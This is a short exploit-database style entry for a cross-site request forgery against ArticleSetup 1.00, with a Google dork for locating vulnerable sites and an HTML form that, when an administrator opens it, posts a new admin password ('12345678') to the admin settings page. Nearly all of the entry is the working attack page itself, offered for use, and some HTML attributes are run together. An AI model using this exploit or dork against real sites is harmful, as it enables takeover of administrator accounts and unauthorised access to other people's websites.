<!--# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing# Date: 2016/06/04# Exploit Author: Ali Ghanbari# Vendor Homepage: http://articlesetup.com/# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip# Version: 1.00#Desc:
When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.#Exploit:--><html><body><form method="post"action="
http://localhost/{PACH}/admin/adminsettings.php"><inputtype="hidden" name="update" value="1"><inputtype="hidden" name="pass1"type="hidden" value="12345678"><inputtype="hidden" name="pass2"type="hidden" value="12345678"><inputtype="submit" value="create"></form></body></html><!--####################################[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
